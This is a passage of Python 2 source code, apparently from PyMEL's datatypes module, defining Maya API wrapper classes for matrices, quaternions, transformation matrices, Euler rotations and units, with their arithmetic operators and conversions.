m.__getitem__(index) <==> m[index]\n Get component index value from self.\n index can be a single numeric value or slice, thus one or more rows will be returned,\n or a row,column tuple of numeric values / slices \"\"\"\n m = MatrixN(self)\n # print list(m)\n return m.__getitem__(index)\n # return super(MatrixN, self).__getitem__(index)\n\n # deprecated and __getitem__ should accept slices anyway\n def __getslice__(self, start, end):\n return self.__getitem__(slice(start, end))\n\n # as _api.Matrix has no __setitem__ method\n def __setitem__(self, index, value):\n \"\"\" m.__setitem__(index, value) <==> m[index] = value\n Set value of component index on self\n index can be a single numeric value or slice, thus one or more rows will be returned,\n or a row,column tuple of numeric values / slices \"\"\"\n m = MatrixN(self)\n m.__setitem__(index, value)\n self.assign(m)\n\n # deprecated and __setitem__ should accept slices 
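    # Index access is routed through a full MatrixN copy (see __getitem__/__setitem__ above); a short\n    # hypothetical sketch, not recorded output:\n    #   m[3]           # fourth row\n    #   m[3, :3]       # translation row of a transform matrix, per the row/column layout noted before the class\n    #   m[0, 0] = 2.0  # modified on a MatrixN copy, then reassigned via assign()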
anyway\n def __setslice__(self, start, end, value):\n self.__setitem__(slice(start, end), value)\n\n def __delitem__(self, index):\n \"\"\" Cannot delete from a class with a fixed shape \"\"\"\n raise TypeError, \"deleting %s from an instance of class %s will make it incompatible with class shape\" % (index, clsname(self))\n\n def __delslice__(self, start, end):\n self.__delitem__(slice(start, end))\n\n # TODO : wrap double Matrix:: operator() (unsigned int row, unsigned int col ) const\n\n # common operators herited from MatrixN\n\n # operators using the Maya API when applicable\n def __eq__(self, other):\n \"\"\" m.__eq__(v) <==> m == v\n Equivalence test \"\"\"\n try:\n return bool(self.apicls.__eq__(self, other))\n except:\n return bool(super(Matrix, self).__eq__(other))\n\n def __ne__(self, other):\n \"\"\" m.__ne__(v) <==> m != v\n Equivalence test \"\"\"\n return (not self.__eq__(other))\n\n def __neg__(self):\n \"\"\" m.__neg__() <==> -m\n The unary minus operator. Negates the value of each of the components of m \"\"\"\n return self.__class__(self.apicls.__neg__(self))\n\n def __add__(self, other):\n \"\"\" m.__add__(v) <==> m+v\n Returns the result of the addition of m and v if v is convertible to a MatrixN (element-wise addition),\n adds v to every component of m if v is a scalar \"\"\"\n try:\n return self.__class__._convert(self.apicls.__add__(self, other))\n except:\n return self.__class__._convert(super(Matrix, self).__add__(other))\n\n def __radd__(self, other):\n \"\"\" m.__radd__(v) <==> v+m\n Returns the result of the addition of m and v if v is convertible to a MatrixN (element-wise addition),\n adds v to every component of m if v is a scalar \"\"\"\n try:\n return self.__class__._convert(self.apicls.__radd__(self, other))\n except:\n return self.__class__._convert(super(Matrix, self).__radd__(other))\n\n def __iadd__(self, other):\n \"\"\" m.__iadd__(v) <==> m += v\n In place addition of m and v, see __add__ \"\"\"\n try:\n return self.__class__(self.__add__(other))\n except:\n return NotImplemented\n\n def __sub__(self, other):\n \"\"\" m.__sub__(v) <==> m-v\n Returns the result of the substraction of v from m if v is convertible to a MatrixN (element-wise substration),\n substract v to every component of m if v is a scalar \"\"\"\n try:\n return self.__class__._convert(self.apicls.__sub__(self, other))\n except:\n return self.__class__._convert(super(Matrix, self).__sub__(other))\n\n def __rsub__(self, other):\n \"\"\" m.__rsub__(v) <==> v-m\n Returns the result of the substraction of m from v if v is convertible to a MatrixN (element-wise substration),\n replace every component c of m by v-c if v is a scalar \"\"\"\n try:\n return self.__class__._convert(self.apicls.__rsub__(self, other))\n except:\n return self.__class__._convert(super(Matrix, self).__rsub__(other))\n\n def __isub__(self, other):\n \"\"\" m.__isub__(v) <==> m -= v\n In place substraction of m and v, see __sub__ \"\"\"\n try:\n return self.__class__(self.__sub__(other))\n except:\n return NotImplemented\n # action depends on second object type\n\n def __mul__(self, other):\n \"\"\" m.__mul__(x) <==> m*x\n If x is a MatrixN, __mul__ is mapped to matrix multiplication m*x, if x is a VectorN, to MatrixN by VectorN multiplication.\n Otherwise, returns the result of the element wise multiplication of m and x if x is convertible to Array,\n multiplies every component of b by x if x is a single numeric value \"\"\"\n try:\n return self.__class__._convert(self.apicls.__mul__(self, other))\n except:\n return 
self.__class__._convert(super(Matrix, self).__mul__(other))\n\n def __rmul__(self, other):\n \"\"\" m.__rmul__(x) <==> x*m\n If x is a MatrixN, __rmul__ is mapped to matrix multiplication x*m, if x is a VectorN (or Vector or Point or Color),\n to transformation, ie VectorN by MatrixN multiplication.\n Otherwise, returns the result of the element wise multiplication of m and x if x is convertible to Array,\n multiplies every component of m by x if x is a single numeric value \"\"\"\n try:\n return self.__class__._convert(self.apicls.__rmul__(self, other))\n except:\n return self.__class__._convert(super(Matrix, self).__rmul__(other))\n\n def __imul__(self, other):\n \"\"\" m.__imul__(n) <==> m *= n\n Valid for Matrix * Matrix multiplication, in place multiplication of MatrixN m by MatrixN n \"\"\"\n try:\n return self.__class__(self.__mul__(other))\n except:\n return NotImplemented\n # __xor__ will defer to Vector __xor__\n\n # API added methods\n\n def setToIdentity(self):\n \"\"\" m.setToIdentity() <==> m = a * b\n Sets MatrixN to the identity matrix \"\"\"\n try:\n self.apicls.setToIdentity(self)\n except:\n self.assign(self.__class__())\n return self\n\n def setToProduct(self, left, right):\n \"\"\" m.setToProduct(a, b) <==> m = a * b\n Sets MatrixN to the result of the product of MatrixN a and MatrixN b \"\"\"\n try:\n self.apicls.setToProduct(self.__class__(left), self.__class__(right))\n except:\n self.assign(self.__class__(self.__class__(left) * self.__class__(right)))\n return self\n\n def transpose(self):\n \"\"\" Returns the transposed Matrix \"\"\"\n try:\n return self.__class__._convert(self.apicls.transpose(self))\n except:\n return self.__class__._convert(super(Matrix, self).transpose())\n\n def inverse(self):\n \"\"\" Returns the inverse Matrix \"\"\"\n try:\n return self.__class__._convert(self.apicls.inverse(self))\n except:\n return self.__class__._convert(super(Matrix, self).inverse())\n\n def adjoint(self):\n \"\"\" Returns the adjoint (adjugate) Matrix \"\"\"\n try:\n return self.__class__._convert(self.apicls.adjoint(self))\n except:\n return self.__class__._convert(super(Matrix, self).adjugate())\n\n def homogenize(self):\n \"\"\" Returns a homogenized version of the Matrix \"\"\"\n try:\n return self.__class__._convert(self.apicls.homogenize(self))\n except:\n return self.__class__._convert(super(Matrix, self).homogenize())\n\n def det(self):\n \"\"\" Returns the determinant of this Matrix instance \"\"\"\n try:\n return self.apicls.det4x4(self)\n except:\n return super(Matrix, self).det()\n\n def det4x4(self):\n \"\"\" Returns the 4x4 determinant of this Matrix instance \"\"\"\n try:\n return self.apicls.det4x4(self)\n except:\n return super(Matrix, self[:4, :4]).det()\n\n def det3x3(self):\n \"\"\" Returns the determinant of the upper left 3x3 submatrix of this Matrix instance,\n it's the same as doing det(m[0:3, 0:3]) \"\"\"\n try:\n return self.apicls.det3x3(self)\n except:\n return super(Matrix, self[:3, :3]).det()\n\n def isEquivalent(self, other, tol=_api.MVector_kTol):\n \"\"\" Returns true if both arguments considered as Matrix are equal within the specified tolerance \"\"\"\n try:\n nself, nother = coerce(self, other)\n except:\n return False\n if isinstance(nself, Matrix):\n return bool(nself.apicls.isEquivalent(nself, nother, tol))\n else:\n return bool(super(MatrixN, nself).isEquivalent(nother, tol))\n\n def isSingular(self):\n \"\"\" Returns True if the given Matrix is singular \"\"\"\n try:\n return bool(self.apicls.isSingular(self))\n except:\n 
return super(MatrixN, self).isSingular()\n\n # additionnal methods\n\n def blend(self, other, weight=0.5):\n \"\"\" Returns a 0.0-1.0 scalar weight blend between self and other Matrix,\n blend mixes Matrix as transformation matrices \"\"\"\n if isinstance(other, Matrix):\n return self.__class__(self.weighted(1.0 - weight) * other.weighted(weight))\n else:\n return blend(self, other, weight=weight)\n\n def weighted(self, weight):\n \"\"\" Returns a 0.0-1.0 scalar weighted blend between identity and self \"\"\"\n if type(self) is not TransformationMatrix:\n self = TransformationMatrix(self)\n return self.__class__._convert(self.asMatrix(weight))\n\nclass FloatMatrix(Matrix):\n\n \"\"\" A 4x4 matrix class that wraps Maya's api FloatMatrix class,\n It behaves identically to Matrix, but it also derives from api's FloatMatrix\n to keep api methods happy\n \"\"\"\n apicls = _api.MFloatMatrix\n\nclass Quaternion(Matrix):\n apicls = _api.MQuaternion\n shape = (4,)\n cnames = ('x', 'y', 'z', 'w')\n\n def __new__(cls, *args, **kwargs):\n shape = kwargs.get('shape', None)\n ndim = kwargs.get('ndim', None)\n size = kwargs.get('size', None)\n # will default to class constant shape = (4,), so it's just an error check to catch invalid shapes,\n # as no other option is actually possible on Quaternion, but this method could be used to allow wrapping\n # of Maya array classes that can have a variable number of elements\n shape, ndim, size = cls._expandshape(shape, ndim, size)\n\n new = cls.apicls.__new__(cls)\n cls.apicls.__init__(new)\n return new\n\n def __init__(self, *args, **kwargs):\n \"\"\" __init__ method for Quaternion \"\"\"\n cls = self.__class__\n\n def isVectorLike(x):\n return isinstance(x, (_api.MVector, Vector)) \\\n or hasattr(x, '__len__') and len(x) == 3\n\n if args:\n # allow both forms for arguments\n if len(args) == 1 and hasattr(args[0], '__iter__') \\\n and not isinstance(args[0], (_api.MQuaternion, Quaternion)):\n args = args[0]\n\n rotate = getattr(args, 'rotate', None)\n # TransformationMatrix, Quaternion, EulerRotation api classes can convert to a rotation Quaternion\n if rotate is not None and not callable(rotate):\n args = args.rotate\n self.unit = 'radians'\n\n elif len(args) == 4 and isinstance(args[3], (basestring, util.EnumValue)): # isinstance(args[3], EulerRotation.RotationOrder) ) :\n quat = _api.MQuaternion()\n quat.assign(EulerRotation(*args, **kwargs))\n args = quat\n # allow to initialize directly from 3 rotations and a rotation order\n\n\n # axis-angle - want to authorize\n # Quaternion(Vector axis, float angle) as well as Quaternion(float angle, Vector axis)\n elif len(args) == 2 and isVectorLike(args[0]) and isinstance(args[1], (int, float)):\n args = (args[1], Vector(args[0]))\n elif len(args) == 2 and isinstance(args[0], (int, float)) and isVectorLike(args[1]):\n args = (args[0], Vector(args[1]))\n # rotate vector-to-vector\n elif len(args) == 2 and isVectorLike(args[0]) and isVectorLike(args[1]):\n args = (Vector(args[0]), Vector(args[1]))\n # rotate vector-to-vector, with scalar factor\n elif len(args) == 3 and isVectorLike(args[0]) and isVectorLike(args[1]) \\\n and isinstance(args[2], (int, float)):\n args = (Vector(args[0]), Vector(args[1]), args[2])\n\n # shortcut when a direct api init is possible\n try:\n self.assign(args)\n except:\n super(Array, self).__init__(*args)\n\n if hasattr(cls, 'cnames') and len(set(cls.cnames) & set(kwargs)):\n # can also use the form =\n l = list(self.flat)\n setcomp = False\n for i, c in enumerate(cls.cnames):\n if c in 
kwargs:\n if float(l[i]) != float(kwargs[c]):\n l[i] = float(kwargs[c])\n setcomp = True\n if setcomp:\n try:\n self.assign(l)\n except:\n msg = \", \".join(map(lambda x, y: x + \"=<\" + util.clsname(y) + \">\", cls.cnames, l))\n raise TypeError, \"in %s(%s), at least one of the components is of an invalid type, check help(%s) \" % (cls.__name__, msg, cls.__name__)\n\n # set properties for easy acces to translation / rotation / scale of a MMatrix or derived class\n # some of these will only yield dependable results if MMatrix is a MTransformationMatrix and some\n # will always be zero for some classes (ie only rotation has a value on a MQuaternion\n\n def _getTranslate(self):\n return Vector(0.0, 0.0, 0.0)\n translate = property(_getTranslate, None, None, \"The translation expressed in this MMQuaternion, which is always (0.0, 0.0, 0.0)\")\n\n def _getRotate(self):\n return self\n\n def _setRotate(self, value):\n self.assign(Quaternion(value))\n rotate = property(_getRotate, _setRotate, None, \"The rotation expressed in this Quaternion, in transform space\")\n\n def _getScale(self):\n return Vector(1.0, 1.0, 1.0)\n scale = property(_getScale, None, None, \"The scale expressed in this Quaternion, which is always (1.0, 1.0, 1.0)\")\n\n # overloads for assign and get though standard way should be to use the data property\n # to access stored values\n\n def assign(self, value):\n \"\"\" Wrap the Quaternion api assign method \"\"\"\n # api Quaternion assign accepts Matrix, Quaternion and EulerRotation\n if isinstance(value, Matrix):\n value = value.rotate\n else:\n if not hasattr(value, '__iter__'):\n value = (value,)\n value = self.apicls(*value)\n self.apicls.assign(self, value)\n return self\n\n # API get, actually not faster than pulling self[i] for such a short structure\n def get(self):\n \"\"\" Wrap the Quaternion api get method \"\"\"\n # need to keep a ref to the MScriptUtil alive until\n # all pointers aren't needed...\n ms = _api.MScriptUtil()\n l = (0,) * self.size\n ms.createFromDouble(*l)\n p = ms.asDoublePtr()\n self.apicls.get(self, p)\n return tuple([ms.getDoubleArrayItem(p, i) for i in xrange(self.size)])\n\n def __getitem__(self, i):\n return self._getitem(i)\n\n # faster to override __getitem__ cause we know Quaternion only has one dimension\n def _getitem(self, i):\n \"\"\" Get component i value from self \"\"\"\n if hasattr(i, '__iter__'):\n i = list(i)\n if len(i) == 1:\n i = i[0]\n else:\n raise IndexError, \"class %s instance %s has only %s dimension(s), index %s is out of bounds\" % (util.clsname(self), self, self.ndim, i)\n if isinstance(i, slice):\n try:\n return list(self)[i]\n except:\n raise IndexError, \"class %s instance %s is of size %s, index %s is out of bounds\" % (util.clsname(self), self, self.size, i)\n else:\n if i < 0:\n i = self.size + i\n if i < self.size and not i < 0:\n if hasattr(self.apicls, '__getitem__'):\n res = self.apicls.__getitem__(self, i)\n else:\n res = list(self)[i]\n return res\n else:\n raise IndexError, \"class %s instance %s is of size %s, index %s is out of bounds\" % (util.clsname(self), self, self.size, i)\n\n # as _api.Vector has no __setitem__ method, so need to reassign the whole Vector\n def __setitem__(self, i, a):\n \"\"\" Set component i value on self \"\"\"\n v = VectorN(self)\n v.__setitem__(i, a)\n self.assign(v)\n\n def __iter__(self):\n for i in range(self.size):\n yield self[i]\n\n def __len__(self):\n\n # api incorrectly returns 4. 
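        # Construction forms accepted by __init__ above (hypothetical sketch, assumes a Maya session):\n        #   Quaternion()                                   # identity (0.0, 0.0, 0.0, 1.0)\n        #   Quaternion(Vector(0, 1, 0), math.pi)           # axis, angle (also accepted as angle, axis)\n        #   Quaternion(Vector(1, 0, 0), Vector(0, 1, 0))   # rotation taking the first vector onto the second\n        #   Quaternion(TransformationMatrix())             # anything exposing a .rotate, taken as its rotation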
this might make sense if it did not simply return z a second time as the fourth element\n return self.size\n#\n# # TODO : support for optional __iter__ arguments\n# def __iter__(self, *args, **kwargs):\n# \"\"\" Iterate on the api components \"\"\"\n# return self.apicls.__iter__(self.data)\n\n def __contains__(self, value):\n \"\"\" True if at least one of the vector components is equal to the argument \"\"\"\n return value in self.__iter__()\n\nclass TransformationMatrix(Matrix):\n apicls = _api.MTransformationMatrix\n\n def _getTranslate(self):\n return Vector(self.getTranslation(_api.MSpace.kTransform))\n\n def _setTranslate(self, value):\n self.setTranslation(Vector(value), _api.MSpace.kTransform)\n translate = property(_getTranslate, _setTranslate, None, \"The translation expressed in this TransformationMatrix, in transform space\")\n\n def _getRotate(self):\n return Quaternion(self.apicls.rotation(self))\n\n def _setRotate(self, value):\n self.rotateTo(Quaternion(value))\n rotate = property(_getRotate, _setRotate, None, \"The quaternion rotation expressed in this TransformationMatrix, in transform space\")\n\n def rotateTo(self, value):\n '''Set to the given rotation (and result self)\n\n Value may be either a Quaternion, EulerRotation object, or a list of\n floats; if it is floats, if it has length 4 it is interpreted as\n a Quaternion; if 3, as a EulerRotation.\n '''\n if not isinstance(value, (Quaternion, EulerRotation,\n _api.MQuaternion, _api.MEulerRotation)):\n if len(value) == 3:\n value = EulerRotation(value)\n elif len(value) == 4:\n value = Quaternion(value)\n else:\n raise ValueError('arg to rotateTo must be a Quaternion, EulerRotation, or an iterable of 3 or 4 floats')\n return self.__class__(self.apicls.rotateTo(self, value))\n\n def eulerRotation(self):\n return EulerRotation(self.apicls.eulerRotation(self))\n\n def _getEuler(self):\n return self.eulerRotation()\n\n def _setEuler(self, value):\n self.rotateTo(EulerRotation(value))\n euler = property(_getEuler, _getEuler, None, \"The euler rotation expressed in this TransformationMatrix, in transform space\")\n\n # The apicls getRotation needs a \"RotationOrder &\" object, which is\n # impossible to make in python...\n # So instead, wrap eulerRotation\n def getRotation(self):\n return self.eulerRotation()\n\n def setRotation(self, *args):\n self.rotateTo(EulerRotation(*args))\n\n def _getScale(self):\n return Vector(self.getScale(_api.MSpace.kTransform))\n\n def _setScale(self, value):\n self.setScale(value, _api.MSpace.kTransform)\n scale = property(_getScale, _setScale, None, \"The scale expressed in this TransformationMatrix, in transform space\")\n\n\nclass EulerRotation(Array):\n\n \"\"\"\n unit handling:\n >>> from pymel.all import *\n >>> import pymel.core.datatypes as dt\n >>>\n >>> currentUnit(angle='degree')\n u'degree'\n >>> e = dt.EulerRotation([math.pi,0,0], unit='radians')\n >>> e\n dt.EulerRotation([3.14159265359, 0.0, 0.0], unit='radians')\n >>> e2 = dt.EulerRotation([180,0,0], unit='degrees')\n >>> e2\n dt.EulerRotation([180.0, 0.0, 0.0])\n >>> e.isEquivalent( e2 )\n True\n >>> e == e2\n True\n\n units are only displayed when they do not match the current ui unit\n >>> dt.Angle.getUIUnit() # check current angular unit\n 'degrees'\n >>> e\n dt.EulerRotation([3.14159265359, 0.0, 0.0], unit='radians')\n >>> dt.Angle.setUIUnit('radians') # change to radians\n >>> e\n dt.EulerRotation([3.14159265359, 0.0, 0.0])\n\n\n \"\"\"\n __metaclass__ = MetaMayaArrayTypeWrapper\n apicls = _api.MEulerRotation\n shape = 
(3,)\n cnames = ('x', 'y', 'z')\n\n RotationOrder = _factories.apiClassInfo['MEulerRotation']['pymelEnums']['RotationOrder']\n\n def _getorder(self):\n return self.RotationOrder[self.apicls.__dict__['order'].__get__(self, self.apicls)]\n\n def _setorder(self, val):\n self.apicls.__dict__['order'].__set__(self, self.RotationOrder.getIndex(val))\n order = property(_getorder, _setorder)\n\n def __new__(cls, *args, **kwargs):\n # shape = kwargs.get('shape', None)\n # ndim = kwargs.get('ndim', None)\n # size = kwargs.get('size', None)\n #\n new = cls.apicls.__new__(cls)\n cls.apicls.__init__(new)\n return new\n\n def __init__(self, *args, **kwargs):\n \"\"\" __init__ method for EulerRotation \"\"\"\n self.unit = None\n self.assign(*args, **kwargs)\n\n def setDisplayUnit(self, unit):\n if unit not in Angle.Unit:\n raise TypeError, \"%s is not a valid angular unit. See Angle.Unit for the list of valid units\"\n self.unit = unit\n\n def __repr__(self):\n argStrs = [str(self)]\n if self.unit != Angle.getUIUnit():\n argStrs.append('unit=%r' % self.unit)\n if self.order != 'XYZ':\n argStrs.append('order=%r' % str(self.order))\n return \"dt.%s(%s)\" % (self.__class__.__name__, ', '.join(argStrs))\n\n def __iter__(self):\n for i in range(self.size):\n yield self[i]\n\n def __getitem__(self, i):\n return Angle(self._getitem(i), 'radians').asUnit(self.unit)\n\n def __setitem__(self, key, val):\n kwargs = {}\n if key in self.cnames:\n kwargs[key] = val\n else:\n kwargs[self.cnames[key]] = val\n self.assign(**kwargs)\n\n # faster to override __getitem__ cause we know Vector only has one dimension\n def _getitem(self, i):\n \"\"\" Get component i value from self \"\"\"\n if hasattr(i, '__iter__'):\n i = list(i)\n if len(i) == 1:\n i = i[0]\n else:\n raise IndexError, \"class %s instance %s has only %s dimension(s), index %s is out of bounds\" % (util.clsname(self), self, self.ndim, i)\n if isinstance(i, slice):\n return _toCompOrArrayInstance(list(self)[i], VectorN)\n try:\n return _toCompOrArrayInstance(list(self)[i], VectorN)\n except:\n raise IndexError, \"class %s instance %s is of size %s, index %s is out of bounds\" % (util.clsname(self), self, self.size, i)\n else:\n if i < 0:\n i = self.size + i\n if i < self.size and not i < 0:\n if hasattr(self.apicls, '__getitem__'):\n return self.apicls.__getitem__(self, i)\n else:\n return list(self)[i]\n else:\n raise IndexError, \"class %s instance %s is of size %s, index %s is out of bounds\" % (util.clsname(self), self, self.size, i)\n\n def assign(self, *args, **kwargs):\n \"\"\" Wrap the Quaternion api assign method \"\"\"\n # After processing, we want to have args be in a format such that\n # we may do:\n # apicls.assign(*args)\n # This means that either:\n # args is a list/tuple of\n\n if 'unit' in kwargs:\n self.unit = kwargs['unit']\n elif self.unit is None:\n self.unit = Angle.getUIUnit()\n\n if len(args) == 1 and isinstance(args[0], _api.MTransformationMatrix):\n args = [args[0].asMatrix()]\n\n # api MEulerRotation assign accepts Matrix, Quaternion and EulerRotation\n validSingleObjs = (_api.MMatrix, _api.MQuaternion, _api.MEulerRotation)\n if len(args) == 1 and isinstance(args[0], validSingleObjs):\n self.unit = 'radians'\n self.apicls.assign(self, args[0])\n elif args:\n if len(args) == 1:\n args = list(args[0])\n elif len(args) == 2 and isinstance(args[1], (basestring, util.EnumValue)):\n args = list(args[0]) + [args[1]]\n else:\n # convert to list, as we may have to do modifications\n args = list(args)\n\n # If only 3 rotation angles supplied, 
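            # Hypothetical construction sketch (assumes a Maya session; compare the doctests in the class docstring):\n            #   EulerRotation(180, 0, 0)                       # three angles, read in the current UI unit\n            #   EulerRotation([math.pi, 0, 0], unit='radians')\n            #   EulerRotation(0, 0, 90, 'ZYX')                 # trailing rotation order, given by name\n            #   EulerRotation(Quaternion())                    # from a Quaternion / Matrix / TransformationMatrix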
and current order is\n # not default, make sure we maintain it\n if self.order != 'XYZ' and len(args) == 3:\n args.append(self.apicls.__dict__['order'].__get__(self, self.apicls))\n\n elif len(args) == 4 and isinstance(args[3], (basestring, util.EnumValue)):\n # allow to initialize directly from 3 rotations and a rotation order as string\n args[3] = self.RotationOrder.getIndex(args[3])\n\n # In case they do something like pass in a mix of Angle objects and\n # float numbers, convert to correct unit one-by-one...\n for i in xrange(3):\n if isinstance(args[i], Angle):\n args[i] = args[i].asUnit('radians')\n elif self.unit != 'radians' and not isinstance(args[i], Angle):\n args[i] = Angle(args[i], self.unit).asUnit('radians')\n self.apicls.setValue(self, *args)\n\n # We do kwargs as a separate step after args, instead of trying to combine\n # them, in case they do something like pass in a EulerRotation(myMatrix, y=2)\n if hasattr(self, 'cnames') and len(set(self.cnames) & set(kwargs)):\n # can also use the form =\n l = list(self.flat)\n setcomp = False\n for i, c in enumerate(self.cnames):\n if c in kwargs:\n if float(l[i]) != float(kwargs[c]):\n l[i] = float(kwargs[c])\n setcomp = True\n if setcomp:\n try:\n self.assign(l)\n except:\n msg = \", \".join(map(lambda x, y: x + \"=<\" + util.clsname(y) + \">\", cls.cnames, l))\n raise TypeError, \"in %s(%s), at least one of the components is of an invalid type, check help(%s) \" % (cls.__name__, msg, cls.__name__)\n\n return self\n\n # API get, actually not faster than pulling self[i] for such a short structure\n def get(self):\n \"\"\" Wrap the MEulerRotation api get method \"\"\"\n # need to keep a ref to the MScriptUtil alive until\n # all pointers aren't needed...\n ms = _api.MScriptUtil()\n l = (0,) * self.size\n ms.createFromDouble(*l)\n p = ms.asDoublePtr()\n self.apicls.get(self, p)\n return tuple([ms.getDoubleArrayItem(p, i) for i in xrange(self.size)])\n\n def __contains__(self, value):\n \"\"\" True if at least one of the vector components is equal to the argument \"\"\"\n return value in self.__iter__()\n\n def __len__(self):\n return self.apicls.__len__(self)\n\n # common operators without an api equivalent are herited from VectorN\n\n # operators using the Maya API when applicable, but that can delegate to VectorN\n\n def __eq__(self, other):\n \"\"\" u.__eq__(v) <==> u == v\n Equivalence test \"\"\"\n if isinstance(other, self.apicls):\n return bool(self.apicls.__eq__(self, other))\n else:\n return bool(super(EulerRotation, self).__eq__(other))\n\n def __ne__(self, other):\n \"\"\" u.__ne__(v) <==> u != v\n Equivalence test \"\"\"\n return (not self.__eq__(other))\n\n def __neg__(self):\n \"\"\" u.__neg__() <==> -u\n The unary minus operator. 
Negates the value of each of the components of u \"\"\"\n return self.__class__(self.apicls.__neg__(self))\n\n def __add__(self, other):\n \"\"\" u.__add__(v) <==> u+v\n Returns the result of the addition of u and v if v is convertible to a VectorN (element-wise addition),\n adds v to every component of u if v is a scalar \"\"\"\n try:\n return self.__class__._convert(self.apicls.__add__(self, other))\n except:\n return self.__class__._convert(super(EulerRotation, self).__add__(other))\n\n def __radd__(self, other):\n \"\"\" u.__radd__(v) <==> v+u\n Returns the result of the addition of u and v if v is convertible to a VectorN (element-wise addition),\n adds v to every component of u if v is a scalar \"\"\"\n try:\n return self.__class__._convert(self.apicls.__radd__(self, other))\n except:\n return self.__class__._convert(super(EulerRotation, self).__radd__(other))\n\n def __iadd__(self, other):\n \"\"\" u.__iadd__(v) <==> u += v\n In place addition of u and v, see __add__ \"\"\"\n try:\n return self.__class__(self.__add__(other))\n except:\n return NotImplemented\n\n def __sub__(self, other):\n \"\"\" u.__sub__(v) <==> u-v\n Returns the result of the substraction of v from u if v is convertible to a VectorN (element-wise substration),\n substract v to every component of u if v is a scalar \"\"\"\n try:\n return self.__class__._convert(self.apicls.__sub__(self, other))\n except:\n return self.__class__._convert(super(EulerRotation, self).__sub__(other))\n\n def __rsub__(self, other):\n \"\"\" u.__rsub__(v) <==> v-u\n Returns the result of the substraction of u from v if v is convertible to a VectorN (element-wise substration),\n replace every component c of u by v-c if v is a scalar \"\"\"\n try:\n return self.__class__._convert(self.apicls.__rsub__(self, other))\n except:\n return self.__class__._convert(super(EulerRotation, self).__rsub__(other))\n\n def __isub__(self, other):\n \"\"\" u.__isub__(v) <==> u -= v\n In place substraction of u and v, see __sub__ \"\"\"\n try:\n return self.__class__(self.__sub__(other))\n except:\n return NotImplemented\n\n def __div__(self, other):\n \"\"\" u.__div__(v) <==> u/v\n Returns the result of the division of u by v if v is convertible to a VectorN (element-wise division),\n divide every component of u by v if v is a scalar \"\"\"\n try:\n return self.__class__._convert(self.apicls.__div__(self, other))\n except:\n return self.__class__._convert(super(EulerRotation, self).__div__(other))\n\n def __rdiv__(self, other):\n \"\"\" u.__rdiv__(v) <==> v/u\n Returns the result of of the division of v by u if v is convertible to a VectorN (element-wise division),\n invert every component of u and multiply it by v if v is a scalar \"\"\"\n try:\n return self.__class__._convert(self.apicls.__rdiv__(self, other))\n except:\n return self.__class__._convert(super(EulerRotation, self).__rdiv__(other))\n\n def __idiv__(self, other):\n \"\"\" u.__idiv__(v) <==> u /= v\n In place division of u by v, see __div__ \"\"\"\n try:\n return self.__class__(self.__div__(other))\n except:\n return NotImplemented\n # action depends on second object type\n\n def __mul__(self, other):\n \"\"\" u.__mul__(v) <==> u*v\n The multiply '*' operator is mapped to the dot product when both objects are Vectors,\n to the transformation of u by matrix v when v is a MatrixN,\n to element wise multiplication when v is a sequence,\n and multiplies each component of u by v when v is a numeric type. 
\"\"\"\n try:\n res = self.apicls.__mul__(self, other)\n except:\n res = super(EulerRotation, self).__mul__(other)\n if util.isNumeric(res):\n return res\n else:\n return self.__class__._convert(res)\n\n def __rmul__(self, other):\n \"\"\" u.__rmul__(v) <==> v*u\n The multiply '*' operator is mapped to the dot product when both objects are Vectors,\n to the left side multiplication (pre-multiplication) of u by matrix v when v is a MatrixN,\n to element wise multiplication when v is a sequence,\n and multiplies each component of u by v when v is a numeric type. \"\"\"\n try:\n res = self.apicls.__rmul__(self, other)\n except:\n res = super(EulerRotation, self).__rmul__(other)\n if util.isNumeric(res):\n return res\n else:\n return self.__class__._convert(res)\n\n def __imul__(self, other):\n \"\"\" u.__imul__(v) <==> u *= v\n Valid for EulerRotation * Matrix multiplication, in place transformation of u by Matrix v\n or EulerRotation by scalar multiplication only \"\"\"\n try:\n return self.__class__(self.__mul__(other))\n except:\n return NotImplemented\n # special operators\n# def __xor__(self, other):\n# \"\"\" u.__xor__(v) <==> u^v\n# Defines the cross product operator between two 3D vectors,\n# if v is a MatrixN, u^v is equivalent to u.transformAsNormal(v) \"\"\"\n# if isinstance(other, VectorN) :\n# return self.cross(other)\n# elif isinstance(other, MatrixN) :\n# return self.transformAsNormal(other)\n# else :\n# return NotImplemented\n# def __ixor__(self, other):\n# \"\"\" u.__xor__(v) <==> u^=v\n# Inplace cross product or transformation by inverse transpose of v is v is a MatrixN \"\"\"\n# try :\n# return self.__class__(self.__xor__(other))\n# except :\n# return NotImplemented\n\n\n\n\nclass Unit(float):\n __slots__ = ['unit', 'data', '_unit']\n\n # TODO: implement proper equality comparison - currently,\n # Distance(5, 'meters') == Distance(5, 'centimeters')\n\n @classmethod\n def getUIUnit(cls):\n \"\"\"\n Returns the global UI units currently in use for that type\n \"\"\"\n return cls.sUnit(cls.apicls.uiUnit())\n\n @classmethod\n def setUIUnit(cls, unit=None):\n \"\"\"\n Sets the global UI units currently to use for that type\n \"\"\"\n if unit is None:\n cls.apicls.setUIUnit(cls.apicls.internalUnit())\n else:\n cls.apicls.setUIUnit(cls.kUnit(unit))\n\n @classmethod\n def getInternalUnit(cls):\n \"\"\"\n Returns the internal units currently in use for that type\n \"\"\"\n return cls.sUnit(cls.apicls.internalUnit())\n\n @classmethod\n def uiToInternal(cls, value):\n d = cls(value, cls.getUIUnit())\n return d.asInternalUnit()\n\n @classmethod\n def kUnit(cls, unit=None):\n \"\"\"\n Converts a string unit name to the internal int unit enum representation\n \"\"\"\n if unit:\n return cls.Unit.getIndex(unit)\n else:\n return cls.apicls.uiUnit()\n\n @classmethod\n def sUnit(cls, unit=None):\n \"\"\"\n Converts an internal int unit enum representation to the string unit name\n \"\"\"\n if unit:\n return cls.Unit.getKey(unit)\n else:\n return str(cls.unit[cls.apicls.uiUnit()])\n\n def getUnit(self):\n \"\"\"\n Returns the units currently in effect for this instance\n \"\"\"\n return self.__class__.sUnit(self._unit)\n# def setUnit(self, unit=None) :\n# \"\"\"\n# Sets the units currently in effect for this instance\n# \"\"\"\n# self._unit = self.__class__.kUnit(unit)\n unit = property(getUnit, None, None, \"The units currently in effect for this instance\")\n\n def __new__(cls, value, unit=None):\n unit = cls.kUnit(unit)\n if isinstance(value, cls.apicls):\n value = value.asUnits(unit)\n 
